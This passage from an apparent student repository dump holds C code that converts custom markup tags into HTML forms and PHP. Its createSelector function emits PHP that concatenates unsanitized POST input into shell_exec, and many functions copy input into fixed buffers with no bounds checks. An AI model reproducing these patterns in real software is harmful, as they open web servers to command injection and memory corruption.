tokens);\n\n/**\n * distributeThis\n * \tDistributes the various \"this->\" or \"struct <sname> * this\" tokens that are\n * \tneeded to create a self reference for member functions which have been moved.\n * \tIN:\t\t\ttokens\t\t\t- the program tokens in a vector\n * \t\t\t\tclassName\t\t- the class name we are operating on.\n * \t\t\t\tclassStart\t\t- the start of the class body\n * \t\t\t\tclassStop\t\t- the stop position of the class.\n * \tOUT:\t\t0 on success, error code on failure.\n * \tPOST:\t\tself references have been added to this particular class.\n *\n */\nint distributeThis(Vector* tokens, char* className, int classStart, int classStop);\n\n/**\n *\tgetParams\n *\tgets the parameters in the function definition\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program.\n *\t\t\t\tclassStart\t\t- the starting index of the class.\n *\tOUT:\t\ta vector, containing the parameter names for the function.\n *\tPOST:\t\ta vector has been returned to the caller, so you better use it.\n *\tERROR:\t\ttokens is null, or classStart is NOT a class start...\n */\nVector* getParams(Vector* tokens, int classStart);\n\n/**\n *\taddThisArg\n *\tadds the \"this\" argument to functions that were relocated outside of their\n *\toriginal classes, to allow access to the current calling instance of the struct.\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program, stored in a vector.\n * \t\t\tclassName\t\t- the class name of the function, in a string\n *\t\t\t\tfStart\t\t\t- the starting point of the function\n *\t\t\t\tbStart\t\t\t- the start of the function body (end of head)\n *\tOUT:\t\treturns 0 on success.\n *\tPOST:\t\tthis has been added to the function parameters defined by fstart\n *\t\t\t\tand bstop\n *\tERROR:\t\tany are null/invalid indexes\n */\nint addThisArg(Vector* tokens, char* className, int fStart, int bStart);\n\n/**\n *\taddThisRef\n *\tadds 'this' references to the functions, so that class variables can be\n *\taccessed from other functions.\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program\n *\t\t\t\tclassVariables\t- a vector of the class variables.\n *\t\t\t\tparams\t\t\t- the function parameters.\n *\t\t\t\tfstart\t\t\t- the starting index of the function.\n *\t\t\t\tfstop\t\t\t- the stopping index of the function.\n *\tOUT:\t\treturns the number of substitutions that occurred in the class.\n *\tPOST:\t\tthis-> has been added to all classVariables occurring in tokens.\n */\nint addThisRef(Vector* tokens, Vector* classVariables, Vector* params, int fstart, int fstop);\n\n/**\n *\tmangleAllMembers\n *\tmangles the names of all member function calls in all classes in the program.\n *\tIN:\t\t\ttokens\t\t\t- the vector of tokens in the program.\n *\tOUT:\t\t0 on success.\n *\tPOST:\t\tall member functions have been mangled.\n *\tERROR:\t\ttokens is NULL.\n */\nint mangleAllMembers(Vector* tokens);\n\n/**\n *\tmigrateFunctions\n *\tmoves the functions found in in classes out into program scope\n *\tIN:\t\t\ttokens\t\t\t- the vector containing the program tokens.\n *\tOUT:\t\tvoid\n *\tPOST:\t\tthe functions found in classes in tokens are moved above main.\n *\tERROR:\t\ttokens is NULL\n */\nvoid migrateFunctions(Vector* tokens);\n\n/**\n * \tcreateAllConstructors\n *\tcreates all the constructors for all classes, inserting the above main()\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program, held in a vector.\n *\tOUT:\t\t0 on success, error code (positive or negative) on failure\n *\tPOST:\t\tseveral tokens have been inserted above main, which represent\n *\t\t\t\tconstructors for the structs that we have created.\n *\tERROR:\t\ttokens is null\n */\nint createAllConstructors(Vector* tokens);\n\n/**\n * \tcreateAllConstructors\n * \tcreates, for all classes present in the file, a constructor that assigns\n * \ttheir function pointer member variables to the memory addresses of their\n * \tdeclared counterparts now located in program scope outside the callers.\n * \tIN:\t\t\ttokens\t\t\t- the tokens vector that holds the program\n * \t \t\tpos\t\t\t\t- the position of the class name declaration\n *\tOUT:\t\ta char* that represents a formatted constructor which will\n *\t\t\t\tpopulate the function pointer member variables in the class.\n *\tPOST:\t\ta char* has been returned, and should be inserted into a class.\n *\tERROR:\t\tpos is invalid; tokens in null.\n */\nchar* makeConstructor(Vector* tokens, int pos);\n\n/**\n *\tplaceConstructors\n *\tplaces constructors following all declarations in outer functions.\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program held in a vector.\n */\nint placeConstructors(Vector* tokens);\n\n/**\n *\tfixOuterFunctions\n *\tcorrects function calls in non-member functions, allowing the migrated\n *\tfunctions to be linked successfully with their actual calls.\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program held in a vector.\n *\tOUT:\t\t\n */\nint fixOuterFunctions(Vector* tokens);\n\n/**\n *\tmodifyFunctionCall\n *\tmodifies a function call, causing it to conform to its calling context\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program held in a vector.\n *\t\t\t\tpos\t\t\t\t- the position we are starting at.\n *\tOUT:\t\t0 on success.\n *\tPOST:\t\ttokens->contents[pos] has been mangled to fit its calling.\n *\tERROR:\t\ttokens is null, or pos does not point to a function call.\n */\nint modifyFunctionCall(Vector* tokens, int pos);\n\n#endif\n" }, { "alpha_fraction": 0.569455623626709, "alphanum_fraction": 0.5862796306610107, "avg_line_length": 18.891109466552734, "blob_id": "006978cccf770c61b9295329bdf76c03fe345aed", "content_id": "936519367cb66a0476de4509827ac15d9768043e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 19912, "license_type": "no_license", "max_line_length": 222, "num_lines": 1001, "path": "/tags.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n#include \"tags.h\"\n#include \"generation.h\"\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <dirent.h>\n#include <sys/types.h>\n\nchar* createText(char* textTag)\n{\n\tint i;\n\n\tchar** attributes;\n\tchar* finalTag;\n\t\n\tchar tagText[2048];\n\tchar tagArgs[1024];\n\n\ti = 0;\n\ttagArgs[0] = '\\0';\n\ttagText[0] = '\\0';\n\n\tif(textTag == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\t/* gets the tag attributes from the tag. */\n\tattributes = getArgs(textTag);\n\n\tif(attributes == NULL)\n\t{\n\t\tstrcpy(tagText, \"Default Text\");\n\t}\n\telse\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\t/* checks for the text attribute. If it is not present, then file is the attribute. */\n\t\t\tif(strncmp(\"text\", attributes[i], 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\n\t\t\t\tstrcpy(tagText, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\t/* the only other tag that can be here is the \"file\" attribute. */\n\t\t\telse if(strncmp(\"file\", attributes[i], 4) == 0)\n\t\t\t{\n\t\t\t\tFILE* inFile;\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\n\t\t\t\tinFile = fopen(value, \"r\");\n\t\t\t\tif(inFile == NULL)\n\t\t\t\t{\n\t\t\t\t\t/* establishes the default text, allowing the file to not exist safely. */\n\t\t\t\t\tstrcpy(tagText, \"Default Text\");\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tchar buffer[256];\n\t\t\t\t\tchar tagBuffer[2048];\n\n\t\t\t\t\ttagBuffer[0] = '\\0';\n\n\t\t\t\t\t/* get all the text from the file. */\n\t\t\t\t\twhile(fgets(buffer, 255, inFile) != NULL)\n\t\t\t\t\t{\n\t\t\t\t\t\tstrcat(tagBuffer, buffer);\n\t\t\t\t\t}\n\n\t\t\t\t\t/* copy the text into the tag. remember to return it. */\n\t\t\t\t\tstrcpy(tagText, tagBuffer);\n\n\t\t\t\t\tfclose(inFile);\n\t\t\t\t}\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\t/* this is the \"default\" case. */\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\tfinalTag = malloc(sizeof(char) * (strlen(tagText) + strlen(tagArgs) + 1));\n\tfinalTag[0] = '\\0';\n\n\tstrcat(finalTag, tagText);\n\n\treturn finalTag;\n}\n\n\nchar* createHeader(char* headTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar headerText[512];\n\tchar size[2];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\theaderText[0] = '\\0';\n\tsize[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(headTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\n\t\t\t/* if we have found the text attribute */\n\t\t\tif(strncmp(attributes[i], \"text\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcat(headerText, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\t/* the only other tag is size. */\n\t\t\telse if(strncmp(attributes[i], \"size\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(size, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t/* this can be used to add css elements to the tags. */\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\t/* if the size has not been set. */\n\tif(strlen(size) == 0)\n\t{\n\t\tstrcpy(size, \"3\");\n\t}\n\n\t/* similar; if the header text has not been set, we need to set it. */\n\tif(strlen(headerText) == 0)\n\t{\n\t\tstrcpy(headerText, \"HEADER\");\n\t}\n\n\t/* add 9 extra chars, and a null terminator. */\n\tfinalTag = malloc(sizeof(char) * (strlen(headerText) + strlen(tagArgs) + 10));\n\tif(finalTag == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tfinalTag[0] = '\\0';\n\n\t/* add all the components to the final tag. */\n\tstrcat(finalTag, \"<h\");\n\tstrcat(finalTag, size);\n\tstrcat(finalTag, tagArgs);\n\tstrcat(finalTag, \">\");\n\tstrcat(finalTag, headerText);\n\tstrcat(finalTag, \"</h\");\n\tstrcat(finalTag, size);\n\tstrcat(finalTag, \">\");\n\n\treturn finalTag;\n}\n\n\nchar* createLink(char* linkTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar linkText[512];\n\tchar pageLink[512];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\tlinkText[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(linkTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\t/* if we have found the text attribute */\n\t\t\tif(strncmp(attributes[i], \"text\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(linkText, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\t/* the only other tag is link. */\n\t\t\telse if(strncmp(attributes[i], \"link\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(pageLink, \"\\\"\");\n\t\t\t\tstrcat(pageLink, value);\n\t\t\t\tstrcat(pageLink, \"\\\"\");\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t/* this can be used to add css elements to the tags. */\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\t\t\tfree(attributes[i]);\n\t\t\t\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\t/* similar; if the header text has not been set, we need to set it. */\n\tif(strlen(linkText) == 0)\n\t{\n\t\tstrcpy(linkText, \"\\\"Link\\\"\");\n\t}\n\tif(strlen(pageLink) == 0)\n\t{\n\t\tstrcpy(pageLink, \"url\");\n\t}\n\n\t/* add 9 extra chars, and a null terminator. */\n\tfinalTag = malloc(sizeof(char) * (strlen(linkText) + strlen(pageLink) + strlen(tagArgs) + strlen(\"<a href=><p></p></a>\") + 1));\n\n\tif(finalTag == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tfinalTag[0] = '\\0';\n\n\t/* add all the components to the final tag. */\n\tstrcat(finalTag, \"<a href=\");\n\tstrcat(finalTag, pageLink);\n\tstrcat(finalTag, \">\");\n\tstrcat(finalTag, \"<p\");\n\tstrcat(finalTag, tagArgs);\n\tstrcat(finalTag, \">\");\n\tstrcat(finalTag, linkText);\n\tstrcat(finalTag, \"</p>\");\n\tstrcat(finalTag, \"</a>\");\n\n\treturn finalTag;\n}\n\n\nchar* createButton(char* buttonTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar buttonName[512];\n\tchar buttonLink[512];\n\tchar buttonText[512];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\tbuttonName[0] = '\\0';\n\tbuttonLink[0] = '\\0';\n\tbuttonText[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(buttonTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(\"name\", attributes[i], 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(buttonName, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(\"link\", attributes[i], 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(buttonLink, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(\"text\", attributes[i], 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(buttonText, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\n\t\tfree(attributes);\n\t}\n\t\n\tfinalTag = malloc(sizeof(char) * (strlen(tagArgs) + strlen(buttonName) + strlen(buttonLink) + strlen(buttonText) + strlen(\"<form method=\\\"post\\\" action=\\\"\\\"><button type=\\\"submit\\\" name=\\\"\\\">Enter</button></form>\") + 1));\n\tfinalTag[0] = '\\0';\n\n\tstrcat(finalTag, \"<form method=\\\"post\\\" action=\\\"\");\n\tstrcat(finalTag, buttonLink);\n\tstrcat(finalTag, \"\\\" \");\n\tstrcat(finalTag, tagArgs);\n\tstrcat(finalTag, \"><button type=\\\"submit\\\"\");\n\tstrcat(finalTag, \" name=\\\"\");\n\tstrcat(finalTag, buttonName);\n\tstrcat(finalTag, \"\\\">\");\n\tstrcat(finalTag, buttonText);\n\tstrcat(finalTag, \"</button></form>\");\n\n\treturn finalTag;\n}\n\n\nchar* createInput(char* inputTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar inputBuffer[2048];\n\tchar finalBuffer[2048];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\tinputBuffer[0] = '\\0';\n\tfinalBuffer[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(inputTag);\n\t\n\n\twhile(attributes[i] != NULL)\n\t{\n\t\t/* this is the action that will be done if the form is submitted. */\n\t\tif(strncmp(attributes[i], \"action\", 6) == 0)\n\t\t{\n\t\t\tchar* value;\n\n\t\t\tvalue = getValue(attributes[i]);\n\t\t\tstrcat(inputBuffer, \" action=\\\"\");\n\t\t\tstrcat(inputBuffer, value);\n\t\t\tstrcat(inputBuffer, \"\\\">\");\n\n\t\t\tfree(value);\n\t\t}\n\t\t/* text is after name. */\n\t\telse if(strncmp(attributes[i], \"text\", 4) == 0)\n\t\t{\n\t\t\tchar* value;\n\t\t\t\n\t\t\tvalue = getValue(attributes[i]);\n\t\t\tstrcat(inputBuffer, value);\n\n\t\t\tfree(value);\n\t\t}\n\t\t/* name must be first. */\n\t\telse if(strncmp(attributes[i], \"name\", 4) == 0)\n\t\t{\n\t\t\tchar* value;\n\n\t\t\tvalue = getValue(attributes[i]);\n\t\t\tstrcat(inputBuffer, \"<input type=\\\"text\\\" name=\\\"\");\n\t\t\tstrcat(inputBuffer, value);\n\t\t\tstrcat(inputBuffer, \"\\\"\");\n\n\n\t\t\tfree(value);\n\t\t}\n\t\t/* value is way after name, and just after text. */\n\t\telse if(strncmp(attributes[i], \"value\", 5) == 0)\n\t\t{\n\t\t\tchar* value;\n\n\t\t\tvalue = getValue(attributes[i]);\n\t\t\tstrcat(inputBuffer, \" value=\\\"\");\n\t\t\tstrcat(inputBuffer, value);\n\t\t\tstrcat(inputBuffer, \"\\\"><br>\");\n\n\t\t\tfree(value);\n\t\t}\n\t\telse\n\t\t{\n\t\t\tstrcat(tagArgs, \" \");\n\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t}\n\t\t\n\t\tfree(attributes[i]);\n\t\ti++;\n\t}\n\tfree(attributes);\n\n\tstrcat(inputBuffer, \"<input type=\\\"submit\\\" value=\\\"Submit\\\"></form>\");\n\n\tstrcat(finalBuffer, \"<form method=\\\"post\\\" \");\n\tstrcat(finalBuffer, tagArgs);\n\tstrcat(finalBuffer, inputBuffer);\n\n\tfinalTag = malloc(sizeof(char) * (strlen(finalBuffer) + 1));\n\tstrcpy(finalTag, finalBuffer);\n\t\n\treturn finalTag;\n}\n\n\nchar* createRadio(char* radioTag)\n{\n\tint i;\n\tint cbuff;\n\tint numButtons;\n\n\tchar tagArgs[1024];\n\tchar radioBuffer[2048];\n\tchar actionBuffer[512];\n\tchar nameBuffer[512];\n\tchar valueBuffers[64][256];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\n\ttagArgs[0] = '\\0';\n\tradioBuffer[0] = '\\0';\n\tactionBuffer[0] = '\\0';\n\tnameBuffer[0] = '\\0';\n\t\n\t/* clears all 64 buffers for the values that will eventually do something */\n\tfor(i = 0; i < 64; i++)\n\t{\n\t\tvalueBuffers[i][0] = '\\0';\n\t}\n\t\n\n\ti = 0;\n\tcbuff = 0;\n\tnumButtons = 0;\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(radioTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"action\", 6) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(actionBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(attributes[i], \"name\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(nameBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(attributes[i], \"value\", 5) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(valueBuffers[cbuff], value);\n\t\t\t\tcbuff++;\n\t\t\t\tnumButtons++;\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\tstrcat(radioBuffer, \"<form action=\\\"\");\n\tstrcat(radioBuffer, actionBuffer);\n\tstrcat(radioBuffer, \"\\\">\");\n\tfor(i = 0; i < numButtons; i++)\n\t{\n\t\tstrcat(radioBuffer, \"<input type=\\\"radio\\\" name=\\\"\");\n\t\tstrcat(radioBuffer, nameBuffer);\n\t\tstrcat(radioBuffer, \"\\\" value=\\\"\");\n\t\tstrcat(radioBuffer, valueBuffers[i]);\n\t\tstrcat(radioBuffer, \"\\\"\");\n\t\tif(i == 0)\n\t\t{\n\t\t\tstrcat(radioBuffer, \" checked\");\n\t\t}\n\t\tstrcat(radioBuffer, \">\");\n\t\tstrcat(radioBuffer, valueBuffers[i]);\n\t\tstrcat(radioBuffer, \"<br>\");\n\t}\n\tstrcat(radioBuffer, \"<input type=\\\"submit\\\" value=\\\"submit\\\"></form>\");\n\n\tfinalTag = malloc(sizeof(char) * (strlen(radioBuffer) + 1));\n\tstrcpy(finalTag, radioBuffer);\n\n\treturn finalTag;\n}\n\n\nchar* createPicture(char* pictureTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar imageBuffer[512];\n\tchar width[5];\n\tchar height[5];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\timageBuffer[0] = '\\0';\n\twidth[0] = '\\0';\n\theight[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(pictureTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"image\", 5) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(imageBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(attributes[i], \"size\", 4) == 0)\n\t\t\t{\n\t\t\t\tint j;\n\t\t\t\tint swp;\n\t\t\t\tint cpos;\n\n\t\t\t\tchar* value;\n\n\t\t\t\tj = 0;\n\t\t\t\tswp = 0;\n\t\t\t\tcpos = 0;\n\n\t\t\t\t/* stored as <width>x<height> */\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tfor(j = 0; j < strlen(value); j++)\n\t\t\t\t{\n\t\t\t\t\tif(value[j] == 'x')\n\t\t\t\t\t{\n\t\t\t\t\t\tswp = 1;\n\t\t\t\t\t\twidth[cpos] = '\\0';\n\t\t\t\t\t\tcpos = 0;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tif(swp == 1)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\theight[cpos] = value[j];\n\t\t\t\t\t\t}\n\t\t\t\t\t\telse\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\twidth[cpos] = value[j];\n\t\t\t\t\t\t}\n\t\t\t\t\t\tcpos ++;\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t}\n\t\t\t\theight[cpos] = '\\0';\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\t\t\t\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\tfinalTag = malloc(sizeof(char) * (strlen(height) + strlen(width) + strlen(imageBuffer) + strlen(tagArgs) + strlen(\"<img src=\\\"\\\" alt=\\\"Image_\\\" height=\\\"\\\" width = \\\"\\\">\") + 1));\n\tfinalTag[0] = '\\0';\n\n\tstrcat(finalTag, \"<img src=\\\"\");\n\tstrcat(finalTag, imageBuffer);\n\tstrcat(finalTag, \"\\\" alt=\\\"Image_\");\n\tstrcat(finalTag, imageBuffer);\n\tstrcat(finalTag, \"\\\" width=\\\"\");\n\tstrcat(finalTag, width);\n\tstrcat(finalTag, \"\\\" height=\\\"\");\n\tstrcat(finalTag, height);\n\tstrcat(finalTag, \"\\\">\");\n\t\n\treturn finalTag;\n}\n\n\nchar* createExec(char* execTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar execBuffer[2048];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\texecBuffer[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(execTag);\n\n\tif(attributes != NULL)\n\t{\n\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"exe\", 3) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(execBuffer, value);\t\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\tfinalTag = malloc(sizeof(char) * (strlen(execBuffer) + strlen(tagArgs) + strlen(\"<?php exec(\\\"\\\", $output, $result); ?>\") + 1));\n\n\tstrcat(finalTag, \"<?php exec(\\\"\");\n\tstrcat(finalTag, execBuffer);\n\tstrcat(finalTag, \"\\\", $output, $result); \");\n\tstrcat(finalTag, tagArgs);\n\tstrcat(finalTag, \"?>\");\n\n\treturn finalTag;\n}\n\nchar* createDiv(char* divTag)\n{\n\tint i;\n\tchar tagArgs[1024];\n\tchar idBuffer[512];\n\tchar divBuffer[2048];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\ttagArgs[0] = '\\0';\n\tidBuffer[0] = '\\0';\n\tdivBuffer[0] = '\\0';\n\n\tattributes = getArgs(divTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"id\", 2) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(idBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\t\n\tstrcpy(divBuffer, \"<div id=\\\"\");\n\tstrcat(divBuffer, idBuffer);\n\tstrcat(divBuffer, \"\\\" \");\n\tstrcat(divBuffer, tagArgs);\n\tstrcat(divBuffer, \">\");\n\n\tfinalTag = malloc(sizeof(char) * (strlen(divBuffer) + 1));\n\tstrcpy(finalTag, divBuffer);\n\n\treturn finalTag;\n}\n\n\nchar* createSelector(char* selTag)\n{\n\tint i;\n\tchar tagArgs[1024];\n\tchar formBuffer[512];\n\tchar buffer[2048];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\tattributes = getArgs(selTag);\n\ti = 0;\n\ttagArgs[0] = '\\0';\n\tbuffer[0] = '\\0';\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"form\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(formBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\n\tstrcat(buffer, \"<?php\\n\");\n\tstrcat(buffer, \"$streamsraw = shell_exec(\\\"./db streams \\\\\\\"\\\".$_POST[\\\"username\\\"].\\\"\\\\\\\" strm 0 pdate\\\");\\n\");\n\tstrcat(buffer, \"$streams = explode(',', $streamsraw, 100);\\n\");\n\n\tstrcat(buffer, \"echo \\\"<select \");\n\tstrcat(buffer, tagArgs);\n\tstrcat(buffer, \" name=\\\\\\\"stream\\\\\\\" form=\\\\\\\"\");\n\tstrcat(buffer, formBuffer);\n\tstrcat(buffer, \"\\\\\\\">\\\\n\\\";\\n\");\n\n\tstrcat(buffer, \"foreach($streams as $stream)\\n{\\n\");\n\tstrcat(buffer, \"$stream = trim($stream);\\n\");\n\tstrcat(buffer, \"echo \\\"<option value=\\\\\\\"$stream\\\\\\\">$stream</option>\\\\n\\\";\\n}\\n\");\n\tstrcat(buffer, \"echo \\\"<option value=\\\\\\\"all\\\\\\\">all</option>\\\";\");\n\tstrcat(buffer, \"echo \\\"</select><br>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"?>\");\n\n\tfinalTag = malloc(sizeof(char) * (strlen(buffer) + 1));\n\tstrcpy(finalTag, buffer);\n\n\treturn finalTag;\n}\n\n\nchar* createDependency(char* depTag)\n{\n\tint i;\n\tchar tagArgs[1024];\n\tchar idBuffer[512];\n\tchar varBuffer[512];\n\n\tchar depBuffer[2048];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\ttagArgs[0] = '\\0';\n\tidBuffer[0] = '\\0';\n\tdepBuffer[0] = '\\0';\n\n\tattributes = getArgs(depTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"id\", 2) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(idBuffer, 